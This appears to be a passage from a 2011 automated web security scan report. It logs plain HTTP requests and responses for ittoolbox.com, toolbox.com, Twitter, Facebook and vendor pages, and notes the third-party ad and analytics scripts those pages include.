src="http://ad.doubleclick.net/adj/sap.ittoolbox/;pos=horizlarge;role=0;cs=0;ind=0;kw=sap;kw=erp;kw=crm;kw=enterprise;kw=software;kw=applications;kw=r%2f1;kw=r%2f2;kw=r%2f3;kw=soa;kw=netweaver;kw=customerrelationshipmanagement(CRM);kw=productlifecyclemanagement(PLM);kw=supplychainmanagement(SCM);kw=supplierrelationshipmanagement(SRM);kw=Governance;kw=RiskandCompliance(GRC);kw=duet;kw=soa;kw=businessone;kw=AdvancedPlannerandOptimizer(APO);kw=BusinessInformationWarehouse(BW);kw=basis;kw=abap;kw=development;kw=hr;kw=logistics;kw=implementation;kw=career;kw=administration;kw=security;kw=;sz=728x90,468x60,1x1;tile=6;ord=1751868068?">
GET / HTTP/1.1
Host: security.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 81934
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=mruc2m45webcko55sgy2f5jm; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:50:33 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Security Co ...[SNIP]... <link rel="shortcut icon" href="http://images.ittoolbox.com/favicon.ico" /> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script> ...[SNIP]... <div align="center" style="margin-top:inherit;margin-bottom:5px"> <script src="http://ad.doubleclick.net/adj/security.ittoolbox/;pos=horizlarge;role=0;cs=0;ind=0;kw=security;kw=securityadministration;kw=threats;kw=malware;kw=hacker;kw=firewall;kw=antivirus;kw=securityanalyst;kw=filtering;kw=Encryption;kw=Cryptography;kw=IntrusionDetection;kw=Prevention;kw=Vulnerabilities;kw=compliance;kw=SOX;kw=HIPAA;kw=sarbanesoxley;kw=authorization;kw=Intrusion;sz=728x90,468x60,1x1;tile=6;ord=520871755?">
GET / HTTP/1.1
Host: sethgodin.typepad.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

GET / HTTP/1.1
Host: siebel.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 72499
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=yvvy0cefbpzquq2it2cgzprn; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:50:39 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Siebel Comm ...[SNIP]... <link rel="shortcut icon" href="http://images.ittoolbox.com/favicon.ico" /> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script> ...[SNIP]... <div align="center" style="margin-top:inherit;margin-bottom:5px"> <script src="http://ad.doubleclick.net/adj/siebel.ittoolbox/;pos=horizlarge;role=0;cs=0;ind=0;kw=Siebel;kw=CRM;kw=CustomerRelationshipManagement;kw=EIM;kw=EnterpriseIncentiveManagement;kw=PRM;kw=PartnerRelationshipManagement;kw=Projectmanagement;kw=Administration;kw=SiebelAnalytics;kw=SiebelCallCenter;kw=SiebelDevelopment;kw=SiebelMarketing;kw=SiebelManagement;kw=SiebelSales;kw=upgrades;kw=systems;kw=application;kw=integration;sz=728x90,468x60,1x1;tile=6;ord=304030505?">
GET / HTTP/1.1
Host: storage.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 71718
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=qoshvh55jsp2ig55kw2vi245; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:50:41 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Storage Com ...[SNIP]... <link rel="shortcut icon" href="http://images.ittoolbox.com/favicon.ico" /> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script> ...[SNIP]... <div align="center" style="margin-top:inherit;margin-bottom:5px"> <script src="http://ad.doubleclick.net/adj/storage.ittoolbox/;pos=horizlarge;role=0;cs=0;ind=0;kw=CloudComputing;kw=Virtuatlization;kw=Desktopvirtualization;kw=NAS;kw=DAS;kw=SAN;kw=Backup;kw=Recovery;kw=StorageHardware;kw=Brocade;kw=EMC;kw=Tivoli;kw=Veritas;kw=storagemanagement;kw=storage;kw=computerstorage;kw=serverhardware;kw=servers;sz=728x90,468x60,1x1;tile=6;ord=2096608598?">
GET / HTTP/1.1
Host: supplychain.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 74807
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=rqqjl3aklble05amudmoqvyc; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:50:42 GMT
Connection: close

GET / HTTP/1.1
Host: telephony.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 62475
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=3eypwe552rukfx2gthccur2v; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:50:49 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Toolbox for ...[SNIP]... <link rel="shortcut icon" href="http://images.ittoolbox.com/favicon.ico" /> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script> ...[SNIP]... <div align="center" style="margin-top:inherit;margin-bottom:5px"> <script src="http://ad.doubleclick.net/adj/telephony.ittoolbox/;pos=horizlarge;role=0;cs=0;ind=0;kw=;sz=728x90,468x60,1x1;tile=6;ord=1203364972?">
GET /toolboxdotcom HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Wed, 26 Jan 2011 14:56:29 GMT Server: hi Status: 200 OK X-Transaction: 1296053789-52552-6574 ETag: "cba3bfc96bf68c050adb0ae164dc8175" Last-Modified: Wed, 26 Jan 2011 14:56:29 GMT X-Runtime: 0.01600 Content-Type: text/html; charset=utf-8 Content-Length: 51936 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: k=173.193.214.243.1296053788039947; path=/; expires=Wed, 02-Feb-11 14:56:28 GMT; domain=.twitter.com Set-Cookie: guest_id=129605378903672234; path=/; expires=Fri, 25 Feb 2011 14:56:29 GMT Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoHaWQiJWY4MmYzNTRlZWE2MzBkYjZlMzAxMGM2YmExZmIzMTAwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIbmHTwi0B--5f068f484769ee483f9eaf437005d73e90b46f16; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]... </div>
GET /toolboxforit HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Wed, 26 Jan 2011 14:56:27 GMT Server: hi Status: 200 OK X-Transaction: 1296053787-90115-59528 ETag: "88e9aa64188f9d64f88986da2628b13f" Last-Modified: Wed, 26 Jan 2011 14:56:27 GMT X-Runtime: 0.01067 Content-Type: text/html; charset=utf-8 Content-Length: 45652 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: k=173.193.214.243.1296053787142478; path=/; expires=Wed, 02-Feb-11 14:56:27 GMT; domain=.twitter.com Set-Cookie: guest_id=129605378737979704; path=/; expires=Fri, 25 Feb 2011 14:56:27 GMT Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTljM2MwNTc3NjdjNTdhMzAyZDA4OTRlY2U5NzliMjM0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsI9VrTwi0B--bba18e9789744f8014c5ff57c43fcea71113a57e; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]... </div>
GET / HTTP/1.1 Host: unix.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 80502 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=ciicu055vtcjje45vlgvahbj; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:56 GMT Connection: close
GET / HTTP/1.1 Host: visualbasic.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 63969 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=pr5xja553zbb0s45ijt4gx45; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:55 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Visual Basi ...[SNIP]... <link rel="shortcut icon" href="http://images.ittoolbox.com/favicon.ico" /> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script> ...[SNIP]... <div align="center" style="margin-top:inherit;margin-bottom:5px"> <script src="http://ad.doubleclick.net/adj/visualbasic.ittoolbox/;pos=horizlarge;role=0;cs=0;ind=0;kw=visualbasic;kw=vb;kw=.net;kw=visualbasic.net;kw=.netframework;kw=developer;kw=visualbasicdeveloper;kw=.netdeveloper;kw=development;kw=programming;kw=.netdevelopment;kw=visualstudio;kw=vb6;kw=microsoft.net;kw=ms.net;sz=728x90,468x60,1x1;tile=6;ord=1527672427?">
GET / HTTP/1.1 Host: webdesign.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 79392 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=e3e0aj55kknpbv2uorfonxy4; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:55 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Web Design ...[SNIP]... <link rel="shortcut icon" href="http://images.ittoolbox.com/favicon.ico" /> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script> ...[SNIP]... <div align="center" style="margin-top:inherit;margin-bottom:5px"> <script src="http://ad.doubleclick.net/adj/webdesign.ittoolbox/;pos=horizlarge;role=0;cs=0;ind=0;kw=webdesign;kw=webdevelopment;kw=webdesigner;kw=webdeveloper;kw=css;kw=asp;kw=asp.net;kw=perl;kw=python;kw=php;kw=graphic;kw=html;kw=xml;kw=ruby;kw=rails;kw=javascript;kw=adobe;kw=seo;kw=searchengine;kw=hosting;sz=728x90,468x60,1x1;tile=6;ord=1241205491?">
GET / HTTP/1.1 Host: windows.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 77587 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=nseiegiwhp2img3lqow10z3v; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:51:02 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Windows Com ...[SNIP]... <link rel="shortcut icon" href="http://images.ittoolbox.com/favicon.ico" /> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script> ...[SNIP]... <div align="center" style="margin-top:inherit;margin-bottom:5px"> <script src="http://ad.doubleclick.net/adj/windows.ittoolbox/;pos=horizlarge;role=0;cs=0;ind=0;kw=windows;kw=microsoft;kw=operatingsystem;kw=exchange;kw=forefront;kw=office;kw=servers;kw=sharepoint;kw=systemcenter;kw=windows7;kw=networkadministration;kw=unifiedcommunicatiosn;kw=desktopOS;kw=activedirectory;kw=vista;kw=nt;kw=xp;kw=iis;kw=isa;kw=sms;kw=ce;kw=me;kw=2008;kw=95;kw=98;kw=2000;kw=certification;kw=training;kw=dos;kw=2003;kw=home;kw=server;kw=update;kw=patch;kw=shell;kw=defender;kw=spyware;kw=adware;kw=virus;kw=ms-dos;kw=opensource;kw=;sz=728x90,468x60,1x1;tile=6;ord=1485277909?">
GET / HTTP/1.1 Host: wireless.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 73493 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=ssd5o2akjvnbi055fht5lga2; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:51:00 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Wireless Co ...[SNIP]... <link rel="shortcut icon" href="http://images.ittoolbox.com/favicon.ico" /> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script> ...[SNIP]... <div align="center" style="margin-top:inherit;margin-bottom:5px"> <script src="http://ad.doubleclick.net/adj/wireless.ittoolbox/;pos=horizlarge;role=0;cs=0;ind=0;kw=Wireless;kw=networks;kw=networking;kw=smartphones;kw=MAN;kw=WLAN;kw=WWAN;kw=;kw=WAP;kw=3g;kw=4g;kw=wifi;kw=wimax;kw=hubs;kw=routers;kw=modems;kw=handhelds;kw=mobile;kw=computing;kw=PDAs;kw=iphone;kw=android;kw=rim;kw=blackberry;kw=ethernet;kw=bluetooth;kw=gsm;kw=wirelessbroadband;kw=wep;kw=security;kw=cdma;kw=linksys;kw=netgear;kw=d-link;kw=palm;kw=voip;kw=vowifi;kw=mobiledata;kw=htc;kw=motorola;kw=sms;kw=mms;kw=windows;kw=ipad;kw=wi-fi;kw=belkin;kw=LTE;kw=evdo;kw=google;kw=nexusone;kw=ctia;kw=fixedmobileconvergence;kw=hotspots;kw=801.11x;kw=rfid;kw=;sz=728x90,468x60,1x1;tile=6;ord=387836470?">
The response dynamically includes the following script from another domain:
http://munchkin.marketo.net/munchkin.js
Request
GET /blogs/saasweek/ HTTP/1.1 Host: www.ebizq.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 26 Jan 2011 14:56:55 GMT Server: Apache/2.0.46 (Red Hat) Accept-Ranges: bytes X-Powered-By: PHP/4.3.2 Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 56022
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="six ...[SNIP]... </script>
GET /pages/Toolboxcom/117012708708 HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: datr=ODZATe8iFsKm4n_Xjpn2xOrf; expires=Fri, 25-Jan-2013 14:56:56 GMT; path=/; domain=.facebook.com; httponly Set-Cookie: lsd=4TIUB; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Wed, 26 Jan 2011 14:56:57 GMT Content-Length: 154510
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class= ...[SNIP]... <link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/yE/r/vKC7KTGk0BI.css" />
The response dynamically includes the following script from another domain:
https://ssl.google-analytics.com/urchin.js
Request
GET /signupgroup/Welcome_IB.aspx HTTP/1.1 Host: www.industrybrains.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 26 Jan 2011 14:57:03 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 27815
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <!-- $Id: welcome_ib.aspx,v 1.3.8.1 2009-07-29 02:45:22 chris Exp $ --> <html> <head> <title>Marchex Adhere, LLC - Premium Performa ...[SNIP]... <!-- Google Analytics script --> <script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript"></script> ...[SNIP]...
The response dynamically includes the following script from another domain:
http://t5.trackalyzer.com/trackalyze.js
Request
GET /products/desktop-central/index.html HTTP/1.1 Host: www.manageengine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 26 Jan 2011 14:57:01 GMT Server: Apache Last-Modified: Mon, 24 Jan 2011 13:46:19 GMT ETag: "16060-d315c0c0" Accept-Ranges: bytes Content-Length: 90208 Cache-Control: max-age=604800 Expires: Wed, 02 Feb 2011 14:57:01 GMT Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><!-- Instan ...[SNIP]... </script> <script type="text/javascript" language="javascript" src="http://t5.trackalyzer.com/trackalyze.js"></script> ...[SNIP]...
GET /products/service-desk/index.html?ibad HTTP/1.1 Host: www.manageengine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 26 Jan 2011 14:57:03 GMT Server: Apache Last-Modified: Tue, 25 Jan 2011 15:24:32 GMT ETag: "fa73-502d2c00" Accept-Ranges: bytes Content-Length: 64115 Cache-Control: max-age=604800 Expires: Wed, 02 Feb 2011 14:57:03 GMT Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8
GET /us/solutions/infrastructure/virtualization/guarantee.html HTTP/1.1 Host: www.netapp.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache Last-Modified: Wed, 26 Jan 2011 14:55:02 GMT X-Server-Name: dv-c1-r1-u14-b5 Content-Type: text/html;charset=utf-8 Date: Wed, 26 Jan 2011 14:57:08 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cae_browser=desktop; path=/; domain=.netapp.com Content-Length: 104728
GET /cringely/pulpit/ HTTP/1.1 Host: www.pbs.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 26 Jan 2011 14:57:09 GMT Server: Apache/2.2.17 (Unix) Set-Cookie: www.apache.sid=a407b02ae7db3726c0e6bb20994d70e7; path=/; domain=.pbs.org Accept-Ranges: bytes Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 33427
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.o ...[SNIP]... <div class="sidebarbox"> <script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script> ...[SNIP]...
The response dynamically includes the following script from another domain:
http://www.google-analytics.com/urchin.js
Request
GET / HTTP/1.1 Host: www.roughtype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 26 Jan 2011 14:57:11 GMT Server: Apache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 55567
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <META N ...[SNIP]... <link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://www.roughtype.com/rsd.xml" />
GET / HTTP/1.1 Host: www.socialcustomer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET /features/ HTTP/1.1 Host: www.spiceworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 26 Jan 2011 14:57:12 GMT Server: Apache/2.2.3 (CentOS) Set-Cookie: swcls=173.193.214.243.1296053832148878; path=/; domain=.spiceworks.com X-Powered-By: PHP/5.1.6 Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 20485
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
GET /Feedback.aspx HTTP/1.1 Host: www.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 24211 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=x4f3gn55elbncwac4bzxhvnv; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:51:46 GMT Connection: close
GET /PrivacyPolicy.aspx HTTP/1.1 Host: www.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 35183 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=ooszoo554q0sbqbgcenmvfuw; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:51:42 GMT Connection: close
GET /TermsofUse.aspx HTTP/1.1 Host: www.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 46350 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=3xmjev553fihez45e2oo2ivi; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:51:42 GMT Connection: close
GET /about/ HTTP/1.1 Host: www.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 22640 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=orhdbf455xhzzen32ok4mn2c; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:51:40 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> About Toolb ...[SNIP]... <link rel="shortcut icon" href="http://images.ittoolbox.com/favicon.ico" /> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script> ...[SNIP]...
GET /careers/ HTTP/1.1 Host: www.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 19781 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=w25wtxbkl34gxdreyk40jymn; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:51:43 GMT Connection: close
GET /contact/ HTTP/1.1 Host: www.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 25997 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=icbksg45hpzrcf55h0vo2x45; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:51:45 GMT Connection: close
